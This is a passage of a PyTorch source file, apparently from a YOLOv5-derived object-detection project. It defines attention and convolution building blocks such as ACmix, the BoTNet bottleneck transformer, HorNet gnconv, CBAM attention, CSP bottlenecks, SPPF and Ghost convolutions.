self.head_dim, h, w) * scaling\n k_att = k.view(b*self.head, self.head_dim, h, w)\n v_att = v.view(b*self.head, self.head_dim, h, w)\n\n if self.stride > 1:\n q_att = stride(q_att, self.stride)\n q_pe = stride(pe, self.stride)\n else:\n q_pe = pe\n\n unfold_k = self.unfold(self.pad_att(k_att)).view(b*self.head, self.head_dim, self.kernel_att*self.kernel_att, h_out, w_out) # b*head, head_dim, k_att^2, h_out, w_out\n unfold_rpe = self.unfold(self.pad_att(pe)).view(1, self.head_dim, self.kernel_att*self.kernel_att, h_out, w_out) # 1, head_dim, k_att^2, h_out, w_out\n \n att = (q_att.unsqueeze(2)*(unfold_k + q_pe.unsqueeze(2) - unfold_rpe)).sum(1) # (b*head, head_dim, 1, h_out, w_out) * (b*head, head_dim, k_att^2, h_out, w_out) -> (b*head, k_att^2, h_out, w_out)\n att = self.softmax(att)\n\n out_att = self.unfold(self.pad_att(v_att)).view(b*self.head, self.head_dim, self.kernel_att*self.kernel_att, h_out, w_out)\n out_att = (att.unsqueeze(1) * out_att).sum(2).view(b, self.out_planes, h_out, w_out)\n\n ## conv\n f_all = self.fc(torch.cat([q.view(b, self.head, self.head_dim, h*w), k.view(b, self.head, self.head_dim, h*w), v.view(b, self.head, self.head_dim, h*w)], 1))\n f_conv = f_all.permute(0, 2, 1, 3).reshape(x.shape[0], -1, x.shape[-2], x.shape[-1])\n \n out_conv = self.dep_conv(f_conv)\n\n return self.rate1 * out_att + self.rate2 * out_conv\n\n\n# ==== acmix end ====\n\n# === botnet start ===\n\nclass MHSA(nn.Module):\n def __init__(self, n_dims, width=14, height=14, heads=4,pos_emb=False):\n super(MHSA, self).__init__()\n\n self.heads = heads\n self.query = nn.Conv2d(n_dims, n_dims, kernel_size=1)\n self.key = nn.Conv2d(n_dims, n_dims, kernel_size=1)\n self.value = nn.Conv2d(n_dims, n_dims, kernel_size=1)\n self.pos=pos_emb\n if self.pos :\n self.rel_h_weight = nn.Parameter(torch.randn([1, heads, (n_dims ) // heads, 1, int(height)]), requires_grad=True)\n self.rel_w_weight = nn.Parameter(torch.randn([1, heads, (n_dims )// heads, int(width), 1]), requires_grad=True)\n self.softmax = nn.Softmax(dim=-1)\n \n def forward(self, x):\n n_batch, C, width, height = x.size() \n q = self.query(x).view(n_batch, self.heads, C // self.heads, -1)\n k = self.key(x).view(n_batch, self.heads, C // self.heads, -1)\n v = self.value(x).view(n_batch, self.heads, C // self.heads, -1)\n #print('q shape:{},k shape:{},v 
shape:{}'.format(q.shape,k.shape,v.shape)) #1,4,64,256\n content_content = torch.matmul(q.permute(0,1,3,2), k) #1,C,h*w,h*w\n # print(\"qkT=\",content_content.shape)\n c1,c2,c3,c4=content_content.size()\n if self.pos:\n # print(\"old content_content shape\",content_content.shape) #1,4,256,256\n content_position = (self.rel_h_weight + self.rel_w_weight).view(1, self.heads, C // self.heads, -1).permute(0,1,3,2) #1,4,1024,64\n \n content_position = torch.matmul(content_position, q)# ([1, 4, 1024, 256])\n content_position=content_position if(content_content.shape==content_position.shape)else content_position[:,: , :c3,]\n assert(content_content.shape==content_position.shape)\n #print('new pos222-> shape:',content_position.shape)\n # print('new content222-> shape:',content_content.shape)\n energy = content_content + content_position\n else:\n energy=content_content\n attention = self.softmax(energy)\n out = torch.matmul(v, attention.permute(0,1,3,2)) #1,4,256,64\n out = out.view(n_batch, C, width, height)\n return out\nclass BottleneckTransformer(nn.Module):\n # Transformer bottleneck\n #expansion = 1\n\n def __init__(self, c1, c2, stride=1, heads=4, mhsa=True, resolution=None,expansion=1):\n super(BottleneckTransformer, self).__init__()\n c_=int(c2*expansion)\n self.cv1 = Conv(c1, c_, 1,1)\n #self.bn1 = nn.BatchNorm2d(c2)\n if not mhsa:\n self.cv2 = Conv(c_,c2, 3, 1)\n else:\n self.cv2 = nn.ModuleList()\n self.cv2.append(MHSA(c2, width=int(resolution[0]), height=int(resolution[1]), heads=heads))\n if stride == 2:\n self.cv2.append(nn.AvgPool2d(2, 2))\n self.cv2 = nn.Sequential(*self.cv2)\n self.shortcut = c1==c2 \n if stride != 1 or c1 != expansion*c2:\n self.shortcut = nn.Sequential(\n nn.Conv2d(c1, expansion*c2, kernel_size=1, stride=stride),\n nn.BatchNorm2d(expansion*c2)\n )\n self.fc1 = nn.Linear(c2, c2) \n\n def forward(self, x):\n out=x + self.cv2(self.cv1(x)) if self.shortcut else self.cv2(self.cv1(x))\n return out\n \nclass BoT3(nn.Module):\n # CSP Bottleneck with 3 convolutions\n def __init__(self, c1, c2, n=1,e=0.5,e2=1,w=20,h=20): # ch_in, ch_out, number, , expansion,w,h\n super(BoT3, self).__init__()\n c_ = int(c2*e) # hidden channels\n self.cv1 = Conv(c1, c_, 1, 1)\n self.cv2 = Conv(c1, c_, 1, 1)\n self.cv3 = Conv(2 * c_, c2, 1) # act=FReLU(c2)\n self.m = nn.Sequential(*[BottleneckTransformer(c_ ,c_, stride=1, heads=4,mhsa=True,resolution=(w,h),expansion=e2) for _ in range(n)])\n # self.m = nn.Sequential(*[CrossConv(c_, c_, 3, 1, g, 1.0, shortcut) for _ in range(n)])\n\n def forward(self, x):\n return self.cv3(torch.cat((self.m(self.cv1(x)), self.cv2(x)), dim=1)) \n\n\n# === botnet end\n\n\ndef autopad(k, p=None): # kernel, padding\n # Pad to 'same'\n if p is None:\n p = k // 2 if isinstance(k, int) else [x // 2 for x in k] # auto-pad\n return p\n\nclass DropPath(nn.Module):\n \"\"\"Drop paths (Stochastic Depth) per sample (when applied in main path of residual blocks).\n \"\"\"\n\n def __init__(self, drop_prob=None):\n super(DropPath, self).__init__()\n self.drop_prob = drop_prob\n\n def forward(self, x):\n return drop_path_f(x, self.drop_prob, self.training)\n\ndef drop_path_f(x, drop_prob: float = 0., training: bool = False):\n \"\"\"Drop paths (Stochastic Depth) per sample (when applied in main path of residual blocks).\n This is the same as the DropConnect impl I created for EfficientNet, etc networks, however,\n the original name is misleading as 'Drop Connect' is a different form of dropout in a separate paper...\n See discussion: 
https://github.com/tensorflow/tpu/issues/494#issuecomment-532968956 ... I've opted for\n changing the layer and argument names to 'drop path' rather than mix DropConnect as a layer name and use\n 'survival rate' as the argument.\n \"\"\"\n if drop_prob == 0. or not training:\n return x\n keep_prob = 1 - drop_prob\n shape = (x.shape[0],) + (1,) * (x.ndim - 1) # work with diff dim tensors, not just 2D ConvNets\n random_tensor = keep_prob + torch.rand(shape, dtype=x.dtype, device=x.device)\n random_tensor.floor_() # binarize\n output = x.div(keep_prob) * random_tensor\n return output\n\n\nclass HorLayerNorm(nn.Module):\n r\"\"\" LayerNorm that supports two data formats: channels_last (default) or channels_first. \n The ordering of the dimensions in the inputs. channels_last corresponds to inputs with \n shape (batch_size, height, width, channels) while channels_first corresponds to inputs \n with shape (batch_size, channels, height, width).# https://ar5iv.labs.arxiv.org/html/2207.14284\n \"\"\"\n def __init__(self, normalized_shape, eps=1e-6, data_format=\"channels_last\"):\n super().__init__()\n self.weight = nn.Parameter(torch.ones(normalized_shape))\n self.bias = nn.Parameter(torch.zeros(normalized_shape))\n self.eps = eps\n self.data_format = data_format\n if self.data_format not in [\"channels_last\", \"channels_first\"]:\n raise NotImplementedError # by iscyy/air\n self.normalized_shape = (normalized_shape, )\n \n def forward(self, x):\n if self.data_format == \"channels_last\":\n return F.layer_norm(x, self.normalized_shape, self.weight, self.bias, self.eps)\n elif self.data_format == \"channels_first\":\n u = x.mean(1, keepdim=True)\n s = (x - u).pow(2).mean(1, keepdim=True)\n x = (x - u) / torch.sqrt(s + self.eps)\n x = self.weight[:, None, None] * x + self.bias[:, None, None]\n return x\n\n# add by liuqian 2022-08-28 参考 https://blog.csdn.net/qq_38668236/article/details/126410711\n# HorNet结合YOLO ==start==\nclass gnconv(nn.Module): # gnconv模块\n def __init__(self, dim, order=5, gflayer=None, h=14, w=8, s=1.0):\n super().__init__()\n self.order = order\n self.dims = [dim // 2 ** i for i in range(order)]\n self.dims.reverse()\n self.proj_in = nn.Conv2d(dim, 2*dim, 1)\n\n if gflayer is None:\n self.dwconv = get_dwconv(sum(self.dims), 7, True)\n else:\n self.dwconv = gflayer(sum(self.dims), h=h, w=w)\n \n self.proj_out = nn.Conv2d(dim, dim, 1)\n\n self.pws = nn.ModuleList(\n [nn.Conv2d(self.dims[i], self.dims[i+1], 1) for i in range(order-1)]\n )\n self.scale = s\n\n def forward(self, x, mask=None, dummy=False):\n fused_x = self.proj_in(x)\n pwa, abc = torch.split(fused_x, (self.dims[0], sum(self.dims)), dim=1)\n dw_abc = self.dwconv(abc) * self.scale\n dw_list = torch.split(dw_abc, self.dims, dim=1)\n x = pwa * dw_list[0]\n for i in range(self.order -1):\n x = self.pws[i](x) * dw_list[i+1]\n x = self.proj_out(x)\n\n return x\n\ndef get_dwconv(dim, kernel, bias):\n return nn.Conv2d(dim, dim, kernel_size=kernel, padding=(kernel-1)//2 ,bias=bias, groups=dim)\n# HorNet结合YOLO ==end==\n\n\n# add by liuqian 2022-08-29 \n# == HorBlock模块 start ==\nclass HorBlock(nn.Module):# HorBlock模块\n r\"\"\" HorNet block yoloair\n \"\"\"\n def __init__(self, dim, drop_path=0., layer_scale_init_value=1e-6, gnconv=gnconv):\n super().__init__()\n\n self.norm1 = HorLayerNorm(dim, eps=1e-6, data_format='channels_first')\n self.gnconv = gnconv(dim)\n self.norm2 = HorLayerNorm(dim, eps=1e-6)\n self.pwconv1 = nn.Linear(dim, 4 * dim)\n self.act = nn.GELU()\n self.pwconv2 = nn.Linear(4 * dim, dim)\n self.gamma1 = 
nn.Parameter(layer_scale_init_value * torch.ones(dim), \n requires_grad=True) if layer_scale_init_value > 0 else None\n self.gamma2 = nn.Parameter(layer_scale_init_value * torch.ones((dim)), \n requires_grad=True) if layer_scale_init_value > 0 else None\n self.drop_path = DropPath(drop_path) if drop_path > 0. else nn.Identity()\n\n def forward(self, x):\n B, C, H, W = x.shape # [512]\n if self.gamma1 is not None:\n gamma1 = self.gamma1.view(C, 1, 1)\n else:\n gamma1 = 1\n x = x + self.drop_path(gamma1 * self.gnconv(self.norm1(x)))\n input = x\n x = x.permute(0, 2, 3, 1) # (N, C, H, W) -> (N, H, W, C)\n x = self.norm2(x)\n x = self.pwconv1(x)\n x = self.act(x)\n x = self.pwconv2(x)\n if self.gamma2 is not None:\n x = self.gamma2 * x\n x = x.permute(0, 3, 1, 2) # (N, H, W, C) -> (N, C, H, W)\n x = input + self.drop_path(x)\n return x\n# == HorBlock模块 end ==\n\nclass Conv(nn.Module):\n # Standard convolution\n def __init__(self, c1, c2, k=1, s=1, p=None, g=1, act=True): # ch_in, ch_out, kernel, stride, padding, groups\n super().__init__()\n self.conv = nn.Conv2d(c1, c2, k, s, autopad(k, p), groups=g, bias=False)\n self.bn = nn.BatchNorm2d(c2)\n self.act = nn.SiLU() if act is True else (act if isinstance(act, nn.Module) else nn.Identity())\n\n def forward(self, x):\n return self.act(self.bn(self.conv(x)))\n\n def forward_fuse(self, x):\n return self.act(self.conv(x))\n\n\nclass DWConv(Conv):\n # Depth-wise convolution class\n def __init__(self, c1, c2, k=1, s=1, act=True): # ch_in, ch_out, kernel, stride, padding, groups\n super().__init__(c1, c2, k, s, g=math.gcd(c1, c2), act=act)\n\n\nclass TransformerLayer(nn.Module):\n # Transformer layer https://arxiv.org/abs/2010.11929 (LayerNorm layers removed for better performance)\n def __init__(self, c, num_heads):\n super().__init__()\n self.q = nn.Linear(c, c, bias=False)\n self.k = nn.Linear(c, c, bias=False)\n self.v = nn.Linear(c, c, bias=False)\n self.ma = nn.MultiheadAttention(embed_dim=c, num_heads=num_heads)\n self.fc1 = nn.Linear(c, c, bias=False)\n self.fc2 = nn.Linear(c, c, bias=False)\n\n def forward(self, x):\n x = self.ma(self.q(x), self.k(x), self.v(x))[0] + x\n x = self.fc2(self.fc1(x)) + x\n return x\n\n\nclass TransformerBlock(nn.Module):\n # Vision Transformer https://arxiv.org/abs/2010.11929\n def __init__(self, c1, c2, num_layers, num_heads):\n super().__init__()\n self.conv = None\n if c1 != c2:\n self.conv = Conv(c1, c2)\n self.linear = nn.Linear(c2, c2) # learnable position embedding\n self.tr = nn.Sequential(*(TransformerLayer(c2, num_heads) for _ in range(num_layers)))\n self.c2 = c2\n\n def forward(self, x):\n if self.conv is not None:\n x = self.conv(x)\n b, _, w, h = x.shape\n p = x.flatten(2).permute(2, 0, 1)\n return self.tr(p + self.linear(p)).permute(1, 2, 0).reshape(b, self.c2, w, h)\n\n\nclass CBAM(nn.Module):\n def __init__(self, c1, c2):\n super(CBAM, self).__init__()\n self.channel_attention = ChannelAttention(c1)\n self.spatial_attention = SpatialAttention()\n\n def forward(self, x):\n out = self.channel_attention(x) * x\n out = self.spatial_attention(out) * out\n return out\n\n\nclass CBAM2(nn.Module):\n def __init__(self, c1, c2):\n super(CBAM2, self).__init__()\n self.channel_attention = ChannelAttention(c1)\n self.spatial_attention = SpatialAttention()\n\n def forward(self, x):\n out1 = self.channel_attention(x) * x\n out2 = self.spatial_attention(x) * x\n return out1 + out2\n\n\nclass PAM(nn.Module):\n def __init__(self, c1, c2):\n super(PAM, self).__init__()\n self.channel_attention = 
ChannelAttention(c1)\n self.spatial_attention = CoorAttention()\n\n def forward(self, x):\n out = self.channel_attention(x) * x\n out = self.spatial_attention(out) * out\n return out\n\nclass CoorAttention(nn.Module):\n def __init__(self, kernel_size = 7):\n super(CoorAttention, self).__init__()\n # [B, C, H, W] -> [B, C, H, 1]\n self.pool_h = nn.AdaptiveAvgPool2d((None, 1))\n # [B, C, H, W] -> [B, C, 1, W]\n self.pool_w = nn.AdaptiveAvgPool2d((1, None))\n\n self.conv1 = nn.Conv2d(2, 1, kernel_size, padding=kernel_size // 2, bias=False)\n self.sigmoid = nn.Sigmoid()\n\n def forward(self, x):\n n,c,h,w = x.size()\n # [B, C, H, W] -> [B, C, H, 1] -> [B, 1, H, 1]\n x_h = self.pool_h(x) # h avg pool\n avg_out1 = torch.mean(x_h, dim=1, keepdim=True)\n\n # [B, C, H, W] -> [B, C, 1, W] -> [B, 1, 1, W]\n x_w = self.pool_w(x) # w avg pool\n avg_out2, a = torch.max(x_w, dim=1, keepdim=True)\n\n avg_out = avg_out1.expand(-1, -1, -1, w) + avg_out2.expand(-1, -1, h, -1)\n\n # [B, C, H, W] -> [B, C, H, 1] -> [B, 1, H, 1]\n x_h = self.pool_h(x) # h max pool\n max_out1 = torch.mean(x_h, dim=1, keepdim=True)\n \n # [B, C, H, W] -> [B, C, 1, W] -> [B, 1, 1, W]\n x_w = self.pool_w(x) # w max pool\n max_out2, b = torch.max(x_w, dim=1, keepdim=True)\n\n max_out = max_out1.expand(-1, -1, -1, w) + max_out2.expand(-1, -1, h, -1)\n\n x = torch.cat([avg_out, max_out], dim=1)\n x = self.conv1(x)\n return self.sigmoid(x)\n\n\nclass Flatten(nn.Module):\n def forward(self, x):\n return x.view(x.size(0), -1)\n\n\nclass ChannelAttention(nn.Module):\n def __init__(self, in_planes, ratio=16):\n \"\"\"\n :params: in_planes 输入模块的feature map的channel\n :params: ratio 降维/升维因子\n 通道注意力则是将一个通道内的信息直接进行全局处理,容易忽略通道内的信息交互\n \"\"\"\n super(ChannelAttention, self).__init__()\n self.avg_pool = nn.AdaptiveAvgPool2d(1) # 平均池化,是取整个channel所有元素的均值 [3,5,5] => [3,1,1]\n self.max_pool = nn.AdaptiveMaxPool2d(1) # 最大池化,是取整个channel所有元素的最大值[3,5,5] => [3,1,1]\n\n # shared MLP\n self.mlp = nn.Sequential(\n Flatten(),\n nn.Linear(in_planes, in_planes // ratio),\n nn.ReLU(),\n nn.Linear(in_planes // ratio, in_planes)\n )\n\n self.sigmoid = nn.Sigmoid()\n\n def forward(self, x):\n avg_out = self.mlp(self.avg_pool(x))\n max_out = self.mlp(self.max_pool(x))\n out = avg_out + max_out\n return self.sigmoid(out).unsqueeze(2).unsqueeze(3).expand_as(x)\n\n\nclass SpatialAttention(nn.Module):\n def __init__(self, kernel_size=7):\n \"\"\"对空间注意力来说,由于将每个通道中的特征都做同等处理,容易忽略通道间的信息交互\"\"\"\n super(SpatialAttention, self).__init__()\n\n # 这里要保持卷积后的feature尺度不变,必须要padding=kernel_size//2\n self.conv1 = nn.Conv2d(2, 1, kernel_size, padding=kernel_size // 2, bias=False)\n self.sigmoid = nn.Sigmoid()\n\n def forward(self, x): # 输入x = [b, c, 56, 56]\n avg_out = torch.mean(x, dim=1, keepdim=True) # avg_out = [b, 1, 56, 56] 求x的每个像素在所有channel相同位置上的平均值\n max_out, _ = torch.max(x, dim=1, keepdim=True) # max_out = [b, 1, 56, 56] 求x的每个像素在所有channel相同位置上的最大值\n x = torch.cat([avg_out, max_out], dim=1) # x = [b, 2, 56, 56] concat操作\n x = self.conv1(x) # x = [b, 1, 56, 56] 卷积操作,融合avg和max的信息,全方面考虑\n return self.sigmoid(x)\n\n\nclass CBAM3(nn.Module):\n def __init__(self, c1, c2):\n super(CBAM3, self).__init__()\n self.channel_attention = ChannelAttention2(c1)\n self.spatial_attention = SpatialAttention2()\n\n def forward(self, x):\n out1 = self.channel_attention(x) * x\n out2 = self.spatial_attention(x) * x\n return out1 + out2\n\n\nclass ChannelAttention2(nn.Module):\n def __init__(self, in_planes, ratio=16):\n \"\"\"\n :params: in_planes 输入模块的feature map的channel\n :params: ratio 降维/升维因子\n 
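        English gloss of the Chinese notes in this docstring (added): in_planes is the
        channel count of the incoming feature map, ratio is the reduction factor, and
        the caveat is that channel attention pools each channel globally, so it tends
        to miss interactions inside a channel.

        Added shape sketch (not in the original):
            x [B, C, H, W] -> avg/max pool [B, C, 1, 1] -> fc1 [B, C//ratio, 1, 1]
            -> relu -> fc2 [B, C, 1, 1] -> sigmoid -> per-channel weights for x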
通道注意力则是将一个通道内的信息直接进行全局处理,容易忽略通道内的信息交互\n \"\"\"\n super(ChannelAttention2, self).__init__()\n self.avg_pool = nn.AdaptiveAvgPool2d(1) # 平均池化,是取整个channel所有元素的均值 [3,5,5] => [3,1,1]\n self.max_pool = nn.AdaptiveMaxPool2d(1) # 最大池化,是取整个channel所有元素的最大值[3,5,5] => [3,1,1]\n\n # shared MLP\n self.fc1 = nn.Conv2d(in_planes, in_planes // ratio, 1, bias=False)\n self.relu1 = nn.ReLU()\n self.fc2 = nn.Conv2d(in_planes // ratio, in_planes, 1, bias=False)\n\n self.sigmoid = nn.Sigmoid()\n\n def forward(self, x):\n avg_out = self.fc2(self.relu1(self.fc1(self.avg_pool(x))))\n max_out = self.fc2(self.relu1(self.fc1(self.max_pool(x))))\n out = avg_out + max_out\n return self.sigmoid(out)\n\n\nclass SpatialAttention2(nn.Module):\n def __init__(self, kernel_size=3):\n super(SpatialAttention2, self).__init__()\n self.conv1 = nn.Conv2d(2, 1, kernel_size, padding=kernel_size, dilation=3, bias=False)\n self.sigmoid = nn.Sigmoid()\n\n def forward(self, x): # 输入x = [b, c, 56, 56]\n avg_out = torch.mean(x, dim=1, keepdim=True) # avg_out = [b, 1, 56, 56] 求x的每个像素在所有channel相同位置上的平均值\n max_out, _ = torch.max(x, dim=1, keepdim=True) # max_out = [b, 1, 56, 56] 求x的每个像素在所有channel相同位置上的最大值\n x = torch.cat([avg_out, max_out], dim=1) # x = [b, 2, 56, 56] concat操作\n x = self.conv1(x) # x = [b, 1, 56, 56] 卷积操作,融合avg和max的信息,全方面考虑\n return self.sigmoid(x)\n\n\nclass Bottleneck(nn.Module):\n # Standard bottleneck\n def __init__(self, c1, c2, shortcut=True, g=1, e=0.5): # ch_in, ch_out, shortcut, groups, expansion\n super().__init__()\n c_ = int(c2 * e) # hidden channels\n self.cv1 = Conv(c1, c_, 1, 1)\n self.cv2 = Conv(c_, c2, 3, 1, g=g)\n self.add = shortcut and c1 == c2\n\n def forward(self, x):\n return x + self.cv2(self.cv1(x)) if self.add else self.cv2(self.cv1(x))\n\n\nclass Bottleneck_AM(nn.Module):\n # Standard bottleneck\n def __init__(self, c1, c2, shortcut=True, g=1, e=0.5): # ch_in, ch_out, shortcut, groups, expansion\n super().__init__()\n c_ = int(c2 * e) # hidden channels\n self.cv1 = Conv(c1, c_, 1, 1)\n self.am = CBAM(c_, c_)\n self.cv2 = Conv(c_, c2, 3, 1, g=g)\n self.add = shortcut and c1 == c2\n\n def forward(self, x):\n return x + self.cv2(self.am(self.cv1(x))) if self.add else self.cv2(self.am(self.cv1(x)))\n\n\nclass Bottleneck_AM2(nn.Module):\n # Standard bottleneck\n def __init__(self, c1, c2, shortcut=True, g=1, e=0.5): # ch_in, ch_out, shortcut, groups, expansion\n super().__init__()\n c_ = int(c2 * e) # hidden channels\n self.cv1 = Conv(c1, c_, 1, 1)\n self.am = CBAM3(c_, c_)\n self.cv2 = Conv(c_, c2, 3, 1, g=g)\n self.add = shortcut and c1 == c2\n\n def forward(self, x):\n return x + self.cv2(self.am(self.cv1(x))) if self.add else self.cv2(self.am(self.cv1(x)))\n\n\nclass BottleneckCSP(nn.Module):\n # CSP Bottleneck https://github.com/WongKinYiu/CrossStagePartialNetworks\n def __init__(self, c1, c2, n=1, shortcut=True, g=1, e=0.5): # ch_in, ch_out, number, shortcut, groups, expansion\n super().__init__()\n c_ = int(c2 * e) # hidden channels\n self.cv1 = Conv(c1, c_, 1, 1)\n self.cv2 = nn.Conv2d(c1, c_, 1, 1, bias=False)\n self.cv3 = nn.Conv2d(c_, c_, 1, 1, bias=False)\n self.cv4 = Conv(2 * c_, c2, 1, 1)\n self.bn = nn.BatchNorm2d(2 * c_) # applied to cat(cv2, cv3)\n self.act = nn.SiLU()\n self.m = nn.Sequential(*(Bottleneck(c_, c_, shortcut, g, e=1.0) for _ in range(n)))\n\n def forward(self, x):\n y1 = self.cv3(self.m(self.cv1(x)))\n y2 = self.cv2(x)\n return self.cv4(self.act(self.bn(torch.cat((y1, y2), dim=1))))\n\n\nclass C3(nn.Module):\n # CSP Bottleneck with 3 convolutions\n def __init__(self, c1, 
c2, n=1, shortcut=True, g=1, e=0.5): # ch_in, ch_out, number, shortcut, groups, expansion\n super().__init__()\n c_ = int(c2 * e) # hidden channels\n self.cv1 = Conv(c1, c_, 1, 1)\n self.cv2 = Conv(c1, c_, 1, 1)\n self.cv3 = Conv(2 * c_, c2, 1) # act=FReLU(c2)\n self.m = nn.Sequential(*(Bottleneck(c_, c_, shortcut, g, e=1.0) for _ in range(n)))\n # self.m = nn.Sequential(*[CrossConv(c_, c_, 3, 1, g, 1.0, shortcut) for _ in range(n)])\n\n def forward(self, x):\n return self.cv3(torch.cat((self.m(self.cv1(x)), self.cv2(x)), dim=1))\n\n\nclass C3AM(nn.Module):\n # CSP Bottleneck with 3 convolutions and CBAM\n def __init__(self, c1, c2, n=1, shortcut=True, g=1, e=0.5): # ch_in, ch_out, number, shortcut, groups, expansion\n super().__init__()\n c_ = int(c2 * e) # hidden channels\n self.cv1 = Conv(c1, c_, 1, 1)\n self.cv2 = Conv(c1, c_, 1, 1)\n self.cv3 = Conv(2 * c_, c2, 1) # act=FReLU(c2)\n self.am = CBAM(c_, c_)\n self.m = nn.Sequential(*(Bottleneck(c_, c_, shortcut, g, e=1.0) for _ in range(n)))\n # self.m = nn.Sequential(*[CrossConv(c_, c_, 3, 1, g, 1.0, shortcut) for _ in range(n)])\n\n def forward(self, x):\n return self.cv3(torch.cat((self.m(self.am(self.cv1(x))), self.cv2(x)), dim=1))\n\n\nclass C3AM2(C3):\n # C3 module with Bottleneck_AM()\n def __init__(self, c1, c2, n=1, shortcut=True, g=1, e=0.5):\n super().__init__(c1, c2, n, shortcut, g, e)\n c_ = int(c2 * e)\n self.m = nn.Sequential(*(Bottleneck_AM(c_, c_, shortcut, g, e=1.0) for _ in range(n)))\n\n\nclass C3AM3(C3):\n # C3 module with Bottleneck_AM2()\n def __init__(self, c1, c2, n=1, shortcut=True, g=1, e=0.5):\n super().__init__(c1, c2, n, shortcut, g, e)\n c_ = int(c2 * e)\n self.m = nn.Sequential(*(Bottleneck_AM2(c_, c_, shortcut, g, e=1.0) for _ in range(n)))\n\n\nclass C3TR(C3):\n # C3 module with TransformerBlock()\n def __init__(self, c1, c2, n=1, shortcut=True, g=1, e=0.5):\n super().__init__(c1, c2, n, shortcut, g, e)\n c_ = int(c2 * e)\n self.m = TransformerBlock(c_, c_, 4, n)\n\n\nclass C3SPP(C3):\n # C3 module with SPP()\n def __init__(self, c1, c2, k=(5, 9, 13), n=1, shortcut=True, g=1, e=0.5):\n super().__init__(c1, c2, n, shortcut, g, e)\n c_ = int(c2 * e)\n self.m = SPP(c_, c_, k)\n\n\nclass C3Ghost(C3):\n # C3 module with GhostBottleneck()\n def __init__(self, c1, c2, n=1, shortcut=True, g=1, e=0.5):\n super().__init__(c1, c2, n, shortcut, g, e)\n c_ = int(c2 * e) # hidden channels\n self.m = nn.Sequential(*(GhostBottleneck(c_, c_) for _ in range(n)))\n\n\nclass CAM(nn.Module):\n def __init__(self, c1, c2):\n super(CAM, self).__init__()\n self.channel_attention = ChannelAttention(c1)\n\n def forward(self, x):\n out = self.channel_attention(x) * x\n return out\n\n\nclass SAM(nn.Module):\n def __init__(self, c1, c2):\n super(SAM, self).__init__()\n self.spatial_attention = SpatialAttention()\n\n def forward(self, x):\n out = self.spatial_attention(x) * x\n return out\n\n\nclass SPP(nn.Module):\n # Spatial Pyramid Pooling (SPP) layer https://arxiv.org/abs/1406.4729\n def __init__(self, c1, c2, k=(5, 9, 13)):\n super().__init__()\n c_ = c1 // 2 # hidden channels\n self.cv1 = Conv(c1, c_, 1, 1)\n self.cv2 = Conv(c_ * (len(k) + 1), c2, 1, 1)\n self.m = nn.ModuleList([nn.MaxPool2d(kernel_size=x, stride=1, padding=x // 2) for x in k])\n\n def forward(self, x):\n x = self.cv1(x)\n with warnings.catch_warnings():\n warnings.simplefilter('ignore') # suppress torch 1.9.0 max_pool2d() warning\n return self.cv2(torch.cat([x] + [m(x) for m in self.m], 1))\n\n\nclass SPPF(nn.Module):\n # Spatial Pyramid Pooling - Fast (SPPF) 
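# Why SPPF below can replace SPP(5, 9, 13): chained 5x5 max-pools grow the
# receptive field to 9 and then 13. A self-contained check (an added sketch,
# not part of the original file):
import torch
import torch.nn as nn

x = torch.randn(1, 8, 32, 32)
m5, m9, m13 = nn.MaxPool2d(5, 1, 2), nn.MaxPool2d(9, 1, 4), nn.MaxPool2d(13, 1, 6)
assert torch.equal(m5(m5(x)), m9(x))        # two 5x5 pools == one 9x9 pool
assert torch.equal(m5(m5(m5(x))), m13(x))   # three 5x5 pools == one 13x13 pool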
layer for YOLOv5 by Glenn Jocher\n def __init__(self, c1, c2, k=5): # equivalent to SPP(k=(5, 9, 13))\n super().__init__()\n c_ = c1 // 2 # hidden channels\n self.cv1 = Conv(c1, c_, 1, 1)\n self.cv2 = Conv(c_ * 4, c2, 1, 1)\n self.m = nn.MaxPool2d(kernel_size=k, stride=1, padding=k // 2)\n\n def forward(self, x):\n x = self.cv1(x)\n with warnings.catch_warnings():\n warnings.simplefilter('ignore') # suppress torch 1.9.0 max_pool2d() warning\n y1 = self.m(x)\n y2 = self.m(y1)\n return self.cv2(torch.cat([x, y1, y2, self.m(y2)], 1))\n\n\nclass Focus(nn.Module):\n # Focus wh information into c-space\n def __init__(self, c1, c2, k=1, s=1, p=None, g=1, act=True): # ch_in, ch_out, kernel, stride, padding, groups\n super().__init__()\n self.conv = Conv(c1 * 4, c2, k, s, p, g, act)\n # self.contract = Contract(gain=2)\n\n def forward(self, x): # x(b,c,w,h) -> y(b,4c,w/2,h/2)\n return self.conv(torch.cat([x[..., ::2, ::2], x[..., 1::2, ::2], x[..., ::2, 1::2], x[..., 1::2, 1::2]], 1))\n # return self.conv(self.contract(x))\n\n\nclass GhostConv(nn.Module):\n # Ghost Convolution https://github.com/huawei-noah/ghostnet\n def __init__(self, c1, c2, k=1, s=1, g=1, act=True): # ch_in, ch_out, kernel, stride, groups\n super().__init__()\n c_ = c2 // 2 # hidden channels\n self.cv1 = Conv(c1, c_, k, s, None, g, act)\n self.cv2 = Conv(c_, c_, 5, 1, None, c_, act)\n\n def forward(self, x):\n y = self.cv1(x)\n return torch.cat([y, self.cv2(y)], 1)\n\n\nclass GhostBottleneck(nn.Module):\n # Ghost Bottleneck https://github.com/huawei-noah/ghostnet\n def __init__(self, c1, c2, k=3, s=1): # ch_in, ch_out, kernel, stride\n super().__init__()\n c_ = c2 // 2\n self.conv = nn.Sequential(GhostConv(c1, c_, 1, 1), # pw\n DWConv(c_, c_, k, s, act=False) if s == 2 else nn.Identity(), # dw\n GhostConv(c_, c2, 1, 1, act=False)) # pw-linear\n self.shortcut = nn.Sequential(DWConv(c1, c1, k, s, act=False),\n Conv(c1, c2, 1, 1, act=False)) if s == 2 else nn.Identity()\n\n def forward(self, x):\n return self.conv(x) + self.shortcut(x)\n\n\nclass Contract(nn.Module):\n # Contract width-height into channels, i.e. x(1,64,80,80) to x(1,256,40,40)\n def __init__(self, gain=2):\n super().__init__()\n self.gain = gain\n\n def forward(self, x):\n b, c, h, w = x.size() # assert (h / s == 0) and (W / s == 0), 'Indivisible gain'\n s = self.gain\n x = x.view(b, c, h // s, s, w // s, s) # x(1,64,40,2,40,2)\n x = x.permute(0, 3, 5, 1, 2, 4).contiguous() # x(1,2,2,64,40,40)\n return x.view(b, c * s * s, h // s, w // s) # x(1,256,40,40)\n\n\nclass Expand(nn.Module):\n # Expand channels into width-height, i.e. 
